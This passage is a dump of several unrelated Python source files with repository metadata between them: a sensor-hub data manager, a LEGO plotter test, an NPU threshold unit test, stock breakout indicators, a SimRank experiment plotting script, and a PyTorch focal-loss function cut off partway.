self.LanguageJsonIsExist = False self.LanguageJsonRefresh = False self.MenuJson = {} self.MenuJsonIsExist = False self.MwnuJsonRefresh = False self.NotificationJson = {} self.NotificationJsonIsExist = False self.NotificationJsonRefresh = False self.init() self.Setup() def Setup(self): self.CreateAndCheckJsonFiles() self.ImportRawDataFromCoordinateJson() self.ImportRawDataFromInstructionJson() self.ImportRawDataFromHubJson() self.UnzipRawData() def Process(self, fullData=None): if fullData != None: for data in fullData: if self.HubList != []: for item in self.HubList: if item.Process(data=data): self.InstructionJsonRefresh = True break if self.InstructionJsonRefresh: self.InstructionJson['DateTime'] = self.datetime() if self.HubList != []: self.InstructionJson['Counter'] = sum([item.GetPassangerCount() for item in self.HubList]) if DEBUG: print("\f***RF Data:\t{0}{1}{2}".format(TextColour.BOLD + TextColour.OKCYAN, [binascii.hexlify(d, ',') for d in fullData], TextColour.ENDC)) print("***Seat Count:\t{0}{1:2}{2}".format(TextColour.BOLD + TextColour.OKCYAN, self.InstructionJson['Counter'], TextColour.ENDC)) print("***CRC Err:\t{0}{1}{2}\n\r".format(TextColour.BOLD + TextColour.FAIL, sum([crc.features[key.hub.crcErrorCount] for crc in self.HubList]), TextColour.ENDC)) if self.HubList != []: for item in self.HubList: debugLog = "" if item.features[key.hub.px1]: debugLog += "{tc0}{0:2}-{tc1} ID:{id_c1}{1:3}{id_c2}, PxV:{re_c1}{2:5}{re_c2}, PxBV:{rv_c1}{3:5}{rv_c2}, Loop:{lo_c1}{4:3}{lo_c2}, Px Cable:{se_c1}{5}{se_c2}, Seatbelt:{be_c1}{6}{be_c2}, Count:{co_c1}{7:4}{co_c2} --> RF Count:{rf_c1}{8:6}{rf_c2}, RSSI:{rs_c1}{9:4}dBm{rs_c2}, CRCErr:{cc_c1}{10:6}{cc_c2}, Battery:{bt_c1}%{11:3}{bt_c2}" \ .format(item.features[key.hub.px1][key.px.number], binascii.hexlify(item.features[key.hub.idNumber], '-'), item.features[key.hub.px1][key.px.currentValue], item.features[key.hub.px1][key.px.baseLine], item.features[key.hub.loopCount], bool(item.features[key.hub.px1][key.px.cableStatus]), bool(item.features[key.hub.px1][key.px.beltStatus]), item.features[key.hub.px1][key.px.seatCount], item.features[key.hub.dataCount], item.features[key.hub.rssi], item.features[key.hub.crcErrorCount], item.features[key.hub.battery] \ , tc0 = TextColour.BOLD + TextColour.OKCYAN , tc1 = TextColour.ENDC \ , id_c1 = TextColour.OKBLUE , id_c2 = TextColour.ENDC \ , re_c1 = TextColour.OKGREEN if item.features[key.hub.px1][key.px.seatStatus] else TextColour.WARNING , re_c2 = TextColour.ENDC \ , rv_c1 = TextColour.BOLD + TextColour.OKCYAN , rv_c2 = TextColour.ENDC \ , lo_c1 = TextColour.BOLD + TextColour.OKGREEN , lo_c2 = TextColour.ENDC \ , se_c1 = TextColour.OKGREEN if item.features[key.hub.px1][key.px.cableStatus] else TextColour.FAIL , se_c2 = TextColour.ENDC \ , be_c1 = TextColour.OKGREEN if item.features[key.hub.px1][key.px.beltStatus] else TextColour.WARNING , be_c2 = TextColour.ENDC \ , co_c1 = TextColour.HEADER , co_c2 = TextColour.ENDC \ , rf_c1 = TextColour.OKGREEN if item.features[key.hub.dataCount] > 0 else TextColour.FAIL , rf_c2 = TextColour.ENDC \ , rs_c1 = TextColour.HEADER , rs_c2 = TextColour.ENDC \ , cc_c1 = TextColour.FAIL , cc_c2 = TextColour.ENDC \ , bt_c1 = TextColour.OKGREEN if item.features[key.hub.battery] > 20 else TextColour.FAIL , bt_c2 = TextColour.ENDC) if item.features[key.hub.px2]: debugLog += "\n\r{tc0}{0:2}-{tc1} ID:{id_c1}{1:3}{id_c2}, PxV:{re_c1}{2:5}{re_c2}, PxBV:{rv_c1}{3:5}{rv_c2}, Loop:{lo_c1}{4:3}{lo_c2}, Px Cable:{se_c1}{5}{se_c2}, Seatbelt:{be_c1}{6}{be_c2}, Count:{co_c1}{7:4}{co_c2} --> RF Count:{rf_c1}{8:6}{rf_c2}, RSSI:{rs_c1}{9:4}dBm{rs_c2}, CRCErr:{cc_c1}{10:6}{cc_c2}, Battery:{bt_c1}%{11:3}{bt_c2}" \ .format(item.features[key.hub.px2][key.px.number], binascii.hexlify(item.features[key.hub.idNumber], '-'), item.features[key.hub.px2][key.px.currentValue], item.features[key.hub.px2][key.px.baseLine], item.features[key.hub.loopCount], bool(item.features[key.hub.px2][key.px.cableStatus]), bool(item.features[key.hub.px2][key.px.beltStatus]), item.features[key.hub.px2][key.px.seatCount], item.features[key.hub.dataCount], item.features[key.hub.rssi], item.features[key.hub.crcErrorCount], item.features[key.hub.battery] \ , tc0 = TextColour.BOLD + TextColour.OKCYAN , tc1 = TextColour.ENDC \ , id_c1 = TextColour.OKBLUE , id_c2 = TextColour.ENDC \ , re_c1 = TextColour.OKGREEN if item.features[key.hub.px2][key.px.seatStatus] else TextColour.WARNING , re_c2 = TextColour.ENDC \ , rv_c1 = TextColour.BOLD + TextColour.OKCYAN , rv_c2 = TextColour.ENDC \ , lo_c1 = TextColour.BOLD + TextColour.OKGREEN , lo_c2 = TextColour.ENDC \ , se_c1 = TextColour.OKGREEN if item.features[key.hub.px2][key.px.cableStatus] else TextColour.FAIL , se_c2 = TextColour.ENDC \ , be_c1 = TextColour.OKGREEN if item.features[key.hub.px2][key.px.beltStatus] else TextColour.WARNING , be_c2 = TextColour.ENDC \ , co_c1 = TextColour.HEADER , co_c2 = TextColour.ENDC \ , rf_c1 = TextColour.OKGREEN if item.features[key.hub.dataCount] > 0 else TextColour.FAIL , rf_c2 = TextColour.ENDC \ , rs_c1 = TextColour.HEADER , rs_c2 = TextColour.ENDC \ , cc_c1 = TextColour.FAIL , cc_c2 = TextColour.ENDC \ , bt_c1 = TextColour.OKGREEN if item.features[key.hub.battery] > 20 else TextColour.FAIL , bt_c2 = TextColour.ENDC) print(debugLog) del debugLog else: print("{0}{1}{2}".format(TextColour.WARNING, "There is no data available !!", TextColour.ENDC)) print("\n\r{0}".format(self.free())) else: print("\f***RF Data:\t{0}{1}{2}".format(TextColour.BOLD + TextColour.OKCYAN, [binascii.hexlify(d, ',') for d in fullData], TextColour.ENDC)) print("***Seat Count:\t{0}{1:2}{2}".format(TextColour.BOLD + TextColour.OKCYAN, self.InstructionJson['Counter'], TextColour.ENDC)) print("***CRC Err:\t{0}{1}{2}".format(TextColour.BOLD + TextColour.FAIL, sum([crc.features[key.hub.crcErrorCount] for crc in self.HubList]), TextColour.ENDC)) print("*Warning:\tDebug mode is OFF\n\r*Execute:\tUse [-d] command to toggle Debug mode.\n\r*MEMUsage:\t{0}\n\r*Time:\t\t{1}".format(self.free(), self.datetime())) #pass return None def CreateAndCheckJsonFiles(self): try: open(HUBDB_JSON_FILE_NAME, 'r') self.HubJsonIsExist = True except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not open file. ---{}".format(HUBDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise try: open(COORDINATEDB_JSON_FILE_NAME, 'r') self.CoordinateJsonIsExist = True except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not open file. ---{}".format(COORDINATEDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise try: open(INSTRUCTIONDB_JSON_FILE_NAME, 'r') self.InstructionJsonIsExist = True except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not open file. ---{}".format(INSTRUCTIONDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise try: open(LANGUAGEDB_JSON_FILE_NAME, 'r') self.LanguageJsonIsExist = True except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not open file. ---{}".format(LANGUAGEDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise try: open(MENUDB_JSON_FILE_NAME, 'r') self.MenuJsonIsExist = True except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not open file. ---{}".format(MENUDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise try: open(NOTIFICATIONDB_JSON_FILE_NAME, 'r') self.NotificationJsonIsExist = True except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not open file. ---{}".format(NOTIFICATIONDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise def FlushRawDataToJson(self): self.HubJson = {} hubCounter = 0 if self.HubList != []: for hub in self.HubList: self.HubJson[hubCounter] = hub.features hubCounter +=1 with open(HUBDB_JSON_FILE_NAME, 'w') as jf: js.dump(self.HubJson, jf, separators=(',', ':')) jf.close() self.ClearUnnecessaryFiles() def ImportRawDataFromCoordinateJson(self): if self.CoordinateJsonIsExist : try: with open(COORDINATEDB_JSON_FILE_NAME, 'r') as jf: self.CoordinateJson = js.load(jf) jf.close() except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not read file. ---{}".format(COORDINATEDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise def ImportRawDataFromInstructionJson(self): if self.InstructionJsonIsExist : try: with open(INSTRUCTIONDB_JSON_FILE_NAME, 'r') as jf: self.InstructionJson = js.load(jf) jf.close() except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not read file. ---{}".format(INSTRUCTIONDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise def ImportRawDataFromHubJson(self): if self.HubJsonIsExist: try: with open(HUBDB_JSON_FILE_NAME, 'r') as jf: self.HubJson = js.load(jf) jf.close() except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not read file. ---{}".format(HUBDB_JSON_FILE_NAME)) except: print("Unexpected error!") raise def GetCoordinateJsonAsString(self): return js.dumps(self.CoordinateJson, separators=(',', ':')) def GetInstructionJsonAsString(self): return js.dumps(self.InstructionJson, separators=(',', ':')) def UnzipRawData(self): if self.HubJson != {}: self.HubList = [] for key in self.HubJson: self.CreateHubObject(json=self.HubJson[key]) self.InstructionJsonRefresh = True self.ClearUnnecessaryFiles() def DefineHubObject(self, fullData=None): if fullData != None: sNo = -1 for data in fullData: if bool(data[20] & 0x01): checkFlag = not (bool((data[2] >> 0) & 0x01) or bool((data[2] >> 1) & 0x01)) if self.HubList != []: for item in self.HubList: if item.features[key.hub.idNumber] == data[:2]: item.Process(data=data) checkFlag = True if item.features[key.hub.px1]: sNo = item.features[key.hub.px1][key.px.number] if sNo < item.features[key.hub.px1][key.px.number] else sNo if item.features[key.hub.px2]: sNo = item.features[key.hub.px2][key.px.number] if sNo < item.features[key.hub.px2][key.px.number] else sNo if checkFlag is False: self.InstructionJsonRefresh = True if int((data[9] << 8) | data[10]) > T.D or int((data[17] << 8) | data[18]) > T.D: self.CreateHubObject(data=data, sNo=sNo+1) def CreateHubObject(self, json=dict(), data=None, sNo=0): if json != dict(): self.HubList.append(PxHub(json=json, dateTime=self.datetime())) elif data != None: #for _ in range(18): self.HubList.append(PxHub(data=data, sNo=sNo, dateTime=self.datetime())) if self.InstructionJson != {}: hubCounter = 0 for item in self.HubList: self.InstructionJson['PxHubs'][hubCounter] = item.features hubCounter += 1 peripheral.buzzerObject(replay=1, onTime=25) def ClearUnnecessaryFiles(self): self.HubJson = {} gc.collect() def ClearAllData(self): for item in self.HubList: del item self.HubList = [] self.InstructionJson['PxHubs'] = {} self.ClearUnnecessaryFiles() self.RemoveFile(HUBDB_JSON_FILE_NAME) gc.collect() def RemoveFile(self, fileName=None): if fileName: try: os.remove(fileName) except OSError as err: print("OS error: {0}".format(err)) except ValueError: print("Could not remove file. ---{}".format(fileName)) except: print("Unexpected error!") raise def free(self): gc.collect() F = gc.mem_free() A = gc.mem_alloc() T = F+A P = '{0:.2f}%'.format(F/T*100) return ('[RAM] -> Total:{0} Free:{1} ({2})'.format(T,F,P))
55.849398
559
0.494876
4c760f5d710417b40e6a1fb33ff995e7604f586d
6,161
py
Python
lego/test.py
tipptop3d/Horst-oder-Klaus
2afda1a64b5ccace74ebc7b806a5e5501c0f12bb
[ "MIT" ]
null
null
null
lego/test.py
tipptop3d/Horst-oder-Klaus
2afda1a64b5ccace74ebc7b806a5e5501c0f12bb
[ "MIT" ]
null
null
null
lego/test.py
tipptop3d/Horst-oder-Klaus
2afda1a64b5ccace74ebc7b806a5e5501c0f12bb
[ "MIT" ]
null
null
null
""" Test File """ import asyncio import math import matplotlib.pyplot as plt import time from calculus.expression import Expression # Dummies class Port: A = 'A' B = 'B' C = 'C' class Motor: def __init__(self, port, gears=None) -> None: self.port = port self.gears = gears def run_angle(self, speed, angle, wait=True): # print('{}: Running to angle {} at speed {}'.format(self.port, speed, angle)) pass def run(self, speed): # print('{}: Running at speed {}'.format(self.port, speed)) pass def hold(self): pass def wait(ms): time.sleep(ms) DRAW_ASPECT_RATIO = 10/6 # x:y # Motors motor_x = Motor(Port.A, gears=[20, 16]) motor_y = Motor(Port.B, gears=[16]) motor_z = Motor(Port.C) # in mm X_LENGTH = 127 X_LEFT_BOUND = -X_LENGTH/2 X_RIGHT_BOUND = X_LENGTH/2 Y_LENGTH = 91 Y_UPPER_BOUND = Y_LENGTH/2 Y_LOWER_BOUND = -Y_LENGTH/2 # in °/s X_MAX_ANGLE_SPEED = 360 Y_MAX_ANGLE_SPEED = 720 # in ° ANGLE_TO_LIFT = 90 # Distance driven equals the amount of degrees multiplied by the angle ratio # distance = angle * ANGLE_RATIO # Angle needed for given distance is distance divided by angle ratio # angle = distance / ANGLE_RATIO # Same for speeds (replace distance with distance/time or angle with angle/time) SIXTEEN_TEETH_GEAR_DIAMETER = 17.5 # mm CIRCUMFERENCE = SIXTEEN_TEETH_GEAR_DIAMETER * math.pi ANGLE_RATIO = CIRCUMFERENCE * (1/360) PRECISION = 1000 # 100 intervals # somehow the precision alters the speed, so maybe resulting in bugs # if these bugs influences influence the real drawings # fuck new algorithm is needed def find_start(f): x = X_LEFT_BOUND while x < X_RIGHT_BOUND: x += X_LENGTH / PRECISION y = f.evaluate(x) if Y_LOWER_BOUND < y < Y_UPPER_BOUND: return x, y class Plotter: def __init__(self, current_x=X_LEFT_BOUND, current_y=Y_UPPER_BOUND, lifted=False): self._current_x = current_x self._current_y = current_y self.lifted = lifted @property def current_x(self): return self._current_x @current_x.setter def current_x(self, value): # print('x', value) self._current_x = value @property def current_y(self): return self._current_y @current_y.setter def current_y(self, value): # print('y', value) self._current_y = value @property def coords(self): return self.current_x, self.current_y def lift(self, wait=True): if self.lifted: return motor_z.run_angle(360, ANGLE_TO_LIFT, wait=wait) self.lifted = True def lower(self, wait=True): if not self.lifted: return motor_z.run_angle(360, -ANGLE_TO_LIFT, wait=wait) self.lifted = False def move_to(self, coords, wait=True, x_wait=False): x, y = coords # same position, no movement needed if x == self.current_x and y == self.current_y: return if not (X_LEFT_BOUND <= x <= X_RIGHT_BOUND or Y_LOWER_BOUND <= y <= Y_UPPER_BOUND): raise ValueError('Values out of bounds') angle_x = (x - self.current_x) / ANGLE_RATIO angle_y = (y - self.current_y) / ANGLE_RATIO # make sure to lift before moving, but retain old lift status was_lifted = self.lifted if not self.lifted: self.lift() motor_x.run_angle(X_MAX_ANGLE_SPEED, angle_x, wait=x_wait) motor_y.run_angle(Y_MAX_ANGLE_SPEED, angle_y, wait=wait) if not was_lifted: self.lower() self.current_x = x self.current_y = y def draw(self, f): """Draws the expression Args: f (Expression): Expression to draw Yields: float: percentage of progress """ # first derative fp = f.diff() x_points = [] y_points = [] self.lift() # calculate timings x_speed = (X_MAX_ANGLE_SPEED * ANGLE_RATIO) total_time = X_LENGTH / x_speed # t = s / v average_time = total_time / PRECISION self.move_to(find_start(f)) # draw loop while self.current_x < X_RIGHT_BOUND: x_angle_speed = X_MAX_ANGLE_SPEED motor_x.run(x_angle_speed) if not (Y_LOWER_BOUND < f.evaluate(self.current_x) < Y_UPPER_BOUND): y_speed = 0.0 print('not in bounds') else: y_speed = fp.evaluate(self.current_x) y_angle_speed = y_speed / ANGLE_RATIO # speed factor is the ratio of y to y_max speed_factor = 1.0 # if y-speed exceeds, slow down x-motor to retain ratio if abs(y_angle_speed) > Y_MAX_ANGLE_SPEED: speed_factor = abs(y_angle_speed / Y_MAX_ANGLE_SPEED) # respect orientation y_angle_speed = math.copysign(Y_MAX_ANGLE_SPEED, y_speed) x_angle_speed /= speed_factor motor_x.run(x_angle_speed) motor_y.run(y_angle_speed) # average time multiplied with speed factor # gives the actual time for the current speeds time_spent = average_time * speed_factor # needed for loop # s = v · t self.current_x += (x_angle_speed * ANGLE_RATIO) * time_spent self.current_y += (y_angle_speed * ANGLE_RATIO) * time_spent # scatter diagram x_points.append(self.current_x) y_points.append(self.current_y) percentage = (self.current_x + X_LENGTH / 2) / X_LENGTH yield percentage wait(time_spent) plt.scatter(x_points, y_points) plt.show() async def main(): p = Plotter() # tokens = ['(VAL:0.1)', '(VAR:x)', '(TIMES:*)', '(SIN:sin)', '(VAL:30.0)', '(TIMES:*)'] tokens = ['(VAL:0.1)', '(VAR:x)', '(VAL:2.0)', '(POW:^)', '(TIMES:*)'] expr = Expression(tokens) print(expr) for p in p.draw(expr): print(p) if __name__ == '__main__': asyncio.run(main())
25.25
92
0.603311
d5da25defc8cb7cc51e2168e8bc41398ce9bc71c
1,986
py
Python
test/test_npu/test_threshold.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
1
2021-12-02T03:07:35.000Z
2021-12-02T03:07:35.000Z
test/test_npu/test_threshold.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
1
2021-11-12T07:23:03.000Z
2021-11-12T08:28:13.000Z
test/test_npu/test_threshold.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
null
null
null
# Copyright (c) 2020, Huawei Technologies.All rights reserved. # # Licensed under the BSD 3-Clause License (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import torch import numpy as np import sys import copy from common_utils import TestCase, run_tests from common_device_type import dtypes, instantiate_device_type_tests from util_test import create_common_tensor class TestThreshold(TestCase): def cpu_op_exec(self,input1, threshold, value): output = torch.nn.functional.threshold(input1, threshold, value) output = output.numpy() return output def npu_op_exec(self,input1, threshold, value): output = torch.nn.functional.threshold(input1, threshold, value) output = output.to("cpu") output = output.numpy() return output def test_threshold_common_shape_format(self, device): shape_format = [ [[np.float32, 0, (1,5)], [1.0], [20.0]], [[np.int32, 0, (1,5)], [2], [20]], ] for item in shape_format: cpu_input1, npu_input1 = create_common_tensor(item[0], 0, 3) cpu_threshold = npu_threshold = item[1][0] cpu_value = npu_value = item[2][0] cpu_output = self.cpu_op_exec(cpu_input1, cpu_threshold, cpu_value) npu_output = self.npu_op_exec(npu_input1, npu_threshold, npu_value) self.assertRtolEqual(cpu_output, npu_output) instantiate_device_type_tests(TestThreshold, globals(), except_for='cpu') if __name__ == "__main__": run_tests()
38.192308
79
0.697382
e6da965a7373cc43a2028ac7ca1bab7e1dfec1fd
1,348
py
Python
ppyt/indicators/breakout_indicators.py
yusukemurayama/ppytrading
9804d0de870d77bf8a1c847736a636b1342d4600
[ "MIT" ]
4
2016-08-16T07:47:15.000Z
2017-12-11T10:08:47.000Z
ppyt/indicators/breakout_indicators.py
yusukemurayama/ppytrading
9804d0de870d77bf8a1c847736a636b1342d4600
[ "MIT" ]
null
null
null
ppyt/indicators/breakout_indicators.py
yusukemurayama/ppytrading
9804d0de870d77bf8a1c847736a636b1342d4600
[ "MIT" ]
2
2018-06-15T04:43:15.000Z
2020-05-02T07:47:15.000Z
# coding: utf-8 import logging import numpy as np from ppyt.indicators import IndicatorBase from ppyt.indicators.closerecenthighlow_indicators import ( CloseGtRecentHighIndicator, CloseLtRecentLowIndicator ) logger = logging.getLogger(__name__) class UpperBreakoutIndicator(IndicatorBase): """上にブレイクアウトしたかを示す指標です。""" _findkey = 'UpperBreakout' def _build_indicator(self, span, **kwds): """indicatorのデータを組み立てます。 Args: span: 過去何日間の高値を上に抜いたか """ # 当日の高値が、前日までの直近高値を超えたかの指標を取得します。 indi = CloseGtRecentHighIndicator(stock=self.stock, span=span) arr1 = indi.data # 1日過去にずらした配列を取得します。 arr2 = indi.shifted(-1) # 前日は直近高値以下で、当日に直近高値を超えているかを判定します。 return np.logical_and(arr1, np.logical_not(arr2)) class LowerBreakoutIndicator(IndicatorBase): """下にブレイクアウトしたかを示す指標です。""" _findkey = 'LowerBreakout' def _build_indicator(self, span, **kwds): """indicatorのデータを組み立てます。 Args: span: 過去何日間の高値を上に抜いたか """ # 当日の安値が、前日までの直近安値を下回った指標を取得します。 indi = CloseLtRecentLowIndicator(stock=self.stock, span=span) arr1 = indi.data # 1日過去にずらした配列を取得します。 arr2 = indi.shifted(-1) # 前日は直近安値以上で、当日に直近安値未満かを判定します。 return np.logical_and(arr1, np.logical_not(arr2))
25.923077
70
0.669881
e6ea66ab1cd7de4fcef1f4dd4f93d7356e431820
6,103
py
Python
python_experiments/paper_figures/vldbj/draw_varying_c.py
RapidsAtHKUST/SimRank
3a601b08f9a3c281e2b36b914e06aba3a3a36118
[ "MIT" ]
8
2020-04-14T23:17:00.000Z
2021-06-21T12:34:04.000Z
python_experiments/paper_figures/vldbj/draw_varying_c.py
RapidsAtHKUST/SimRank
3a601b08f9a3c281e2b36b914e06aba3a3a36118
[ "MIT" ]
null
null
null
python_experiments/paper_figures/vldbj/draw_varying_c.py
RapidsAtHKUST/SimRank
3a601b08f9a3c281e2b36b914e06aba3a3a36118
[ "MIT" ]
1
2021-01-17T16:26:50.000Z
2021-01-17T16:26:50.000Z
import matplotlib.pyplot as plt from data_analysis.vldbj_data_parsing.varying_c_statistics import * from paper_figures.vldbj.draw_indexing_time_size import TICK_SIZE, LEGEND_SIZE, LABEL_SIZE, reads_d_tag, reads_rq_tag import json import itertools us_to_ms_factor = 10 ** 3 large_size_plus = 4 def get_dict(file_path): with open(file_path) as ifs: return json.load(ifs) relative_path = '../..' c_index_dict = get_dict('{}/data_analysis/data-json/varying_parameters/varying_c_index.json'.format(relative_path)) c_reads_index_dict = get_dict( '{}/data_analysis/data-json/varying_parameters/varying_c_index_reads.json'.format(relative_path)) c_index_dict = dict(itertools.chain(c_index_dict.items(), c_reads_index_dict.items())) c_query_dict = get_dict('{}/data_analysis/data-json/varying_parameters/varying_c_query.json'.format(relative_path)) c_reads_query_dict = get_dict( '{}/data_analysis/data-json/varying_parameters/varying_c_query_reads.json'.format(relative_path)) c_probesim_query_dict = get_dict( '{}/data_analysis/data-json/varying_parameters/probesim_varying_c_query.json'.format(relative_path)) c_query_dict = dict( itertools.chain(c_query_dict.items(), c_reads_query_dict.items(), c_probesim_query_dict.items())) # print c_query_dict def draw_query_index_time(): exp_figure, ax_tuple = plt.subplots(1, 2, sharex=True, figsize=(16, 7)) c_lst = [0.4, 0.5, 0.6, 0.7, 0.8] # 1st: draw querying time def draw_querying_time(): algorithm_tag_lst = [bflpmc_tag, flpmc_tag, bprw_tag, sling_tag, reads_d_tag, reads_rq_tag, isp_tag, tsf_tag, probesim_tag] legend_lst = ['FBLPMC', 'FLPMC', 'BLPMC', 'SLING', 'READS-D', 'READS-Rq', 'ISP', 'TSF', 'ProbeSim'] ax = ax_tuple[0] lst_lst = [] for idx, algorithm in enumerate(algorithm_tag_lst): time_lst = list(map(lambda c: c_query_dict[algorithm][format_str(c)], c_lst)) time_lst = list(map(lambda val: float(val) / us_to_ms_factor if val is not None else None, time_lst)) lst_lst.append(time_lst) color_lst = ['blue', 'orange', 'green', 'red', '#fe01b1', '#ceb301', 'm', 'brown', 'purple', 'k', 'gray'] shape_lst = ['D-.', 's--', 'o:', 'x-', 'P-', '*-', 'v-', '^-', '+-', '<-', '>-', ] def get_marker_size(): if idx == 0: return 18 elif idx == 5: return 26 elif idx == 8: return 30 else: return 22 # print idx, algorithm, time_lst ax.plot(c_lst, time_lst, shape_lst[idx], color=color_lst[idx], markersize=get_marker_size(), markerfacecolor='none') # print 'after plot', idx, algorithm # setup ticks for x and y axis ax.set_ylim(0.4 / us_to_ms_factor, 10 ** 10.5 * 0.3 / us_to_ms_factor) ax.set_xticks(c_lst) ax.set_yscale('log') # setup font size for ticks and labels for tick in ax.yaxis.get_major_ticks(): tick.label.set_fontsize(TICK_SIZE + large_size_plus) for tick in ax.xaxis.get_major_ticks(): tick.label.set_fontsize(TICK_SIZE + large_size_plus) ax.set_ylabel('Avg Query Time (ms)', fontsize=LABEL_SIZE + large_size_plus) ax.set_xlabel('$c$', fontsize=LABEL_SIZE + large_size_plus) ax.grid(True, alpha=0.4) ax.legend(legend_lst, ncol=2, prop={'size': LEGEND_SIZE - 2, "weight": "bold"}, loc=1) # 2nd: draw the index def draw_idx(): algorithm_tag_lst = [flp_tag, sling_tag, reads_d_tag, reads_rq_tag, tsf_tag] legend_lst = ['FLP', 'SLING', 'READS-D', 'READS-Rq', 'TSF'] ax = ax_tuple[1] lst_lst = [] for idx, algorithm in enumerate(algorithm_tag_lst): time_lst = list(map(lambda c: c_index_dict[algorithm][format_str(c)], c_lst)) if algorithm in [tsf_tag]: time_lst = list(map(lambda time_val: 0.0042 if time_val > 0.005 else time_val, time_lst)) lst_lst.append(time_lst) shape_lst = ['D-.', 'x-', 'P-', '*-', '^-'] color_lst = ['blue', 'red', '#fe01b1', '#ceb301', 'brown'] def get_marker_size(): if idx == 0: return 18 elif idx == 3: return 26 else: return 22 ax.plot(c_lst, time_lst, shape_lst[idx], color=color_lst[idx], markersize=get_marker_size(), markerfacecolor='none') ax.set_yscale('log') # setup ticks for x and y axis ax.set_ylim(10 ** -3, 10 ** 5 * 12) for tick in ax.yaxis.get_major_ticks(): tick.label.set_fontsize(TICK_SIZE + large_size_plus) for tick in ax.xaxis.get_major_ticks(): tick.label.set_fontsize(TICK_SIZE + large_size_plus) # setup labels and grid, legend ax.set_ylabel('Indexing Time (s)', fontsize=LABEL_SIZE + large_size_plus) ax.set_xlabel('$c$', fontsize=LABEL_SIZE + large_size_plus) ax.grid(True, alpha=0.2) ax.legend(legend_lst, ncol=2, prop={'size': LEGEND_SIZE, "weight": "bold"}, loc=1) draw_querying_time() draw_idx() # 3rd: save the figure exp_figure.subplots_adjust(wspace=0) plt.tight_layout() plt.savefig('figures/' + 'varying_c' + '.pdf', bbox_inches='tight', dpi=300) plt.close() if __name__ == '__main__': # unit: us algorithm_lst = [bflpmc_tag, flpmc_tag, bprw_tag, sling_tag, tsf_tag, probesim_tag] # for algorithm in algorithm_lst: # print algorithm, c_query_dict[algorithm] index_lst = [flp_tag, sling_tag, tsf_tag] # for algorithm in index_lst: # print algorithm, c_index_dict[algorithm] draw_query_index_time()
40.151316
117
0.600524
5dc79859d9e9acdadbcf74f50a802492149ea1d8
3,593
py
Python
fcos_core/layers/sigmoid_focal_loss_bce.py
HaoGood/MMMC
24dd4ce830efc7a8dc580735903c2a776b6a1a7b
[ "Apache-2.0" ]
3
2022-01-12T11:22:38.000Z
2022-01-27T02:28:30.000Z
fcos_core/layers/sigmoid_focal_loss_bce.py
HaoGood/MMMC
24dd4ce830efc7a8dc580735903c2a776b6a1a7b
[ "Apache-2.0" ]
null
null
null
fcos_core/layers/sigmoid_focal_loss_bce.py
HaoGood/MMMC
24dd4ce830efc7a8dc580735903c2a776b6a1a7b
[ "Apache-2.0" ]
1
2022-01-23T02:45:03.000Z
2022-01-23T02:45:03.000Z
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. import torch from torch.nn import functional as F def sigmoid_focal_loss_bce( inputs: torch.Tensor, targets: torch.Tensor, alpha: float = 0.25, gamma: float = 2.0, funcs: str = 'train', reduction: str = "sum", ) -> torch.Tensor: """ Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002. Args: inputs: A float tensor of arbitrary shape. The predictions for each example. targets: A float tensor with the same shape as inputs. Stores the binary classification label for each element in inputs (0 for the negative class and 1 for the positive class). alpha: (optional) Weighting factor in range (0,1) to balance positive vs negative examples. Default = -1 (no weighting). gamma: Exponent of the modulating factor (1 - p_t) to balance easy vs hard examples. reduction: 'none' | 'mean' | 'sum' 'none': No reduction will be applied to the output. 'mean': The output will be averaged. 'sum': The output will be summed. Returns: Loss tensor with the reduction option applied. """ p = torch.sigmoid(inputs) ce_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduction="none") if funcs == 'stats_bce': return ce_loss.sum(dim=1) p_t = p * targets + (1 - p) * (1 - targets) loss = ce_loss * ((1 - p_t) ** gamma) if alpha >= 0: alpha_t = alpha * targets + (1 - alpha) * (1 - targets) loss = alpha_t * loss if reduction == "mean": loss = loss.mean() elif reduction == "sum": if funcs == 'stats_focal': # loss *= targets loss = loss.sum(dim=1) else: loss = loss.sum() return loss sigmoid_focal_loss_jit = torch.jit.script( sigmoid_focal_loss_bce ) # type: torch.jit.ScriptModule def sigmoid_focal_loss_star( inputs: torch.Tensor, targets: torch.Tensor, alpha: float = -1, gamma: float = 1, reduction: str = "none", ) -> torch.Tensor: """ FL* described in RetinaNet paper Appendix: https://arxiv.org/abs/1708.02002. Args: inputs: A float tensor of arbitrary shape. The predictions for each example. targets: A float tensor with the same shape as inputs. Stores the binary classification label for each element in inputs (0 for the negative class and 1 for the positive class). alpha: (optional) Weighting factor in range (0,1) to balance positive vs negative examples. Default = -1 (no weighting). gamma: Gamma parameter described in FL*. Default = 1 (no weighting). reduction: 'none' | 'mean' | 'sum' 'none': No reduction will be applied to the output. 'mean': The output will be averaged. 'sum': The output will be summed. Returns: Loss tensor with the reduction option applied. """ shifted_inputs = gamma * (inputs * (2 * targets - 1)) loss = -(F.logsigmoid(shifted_inputs)) / gamma 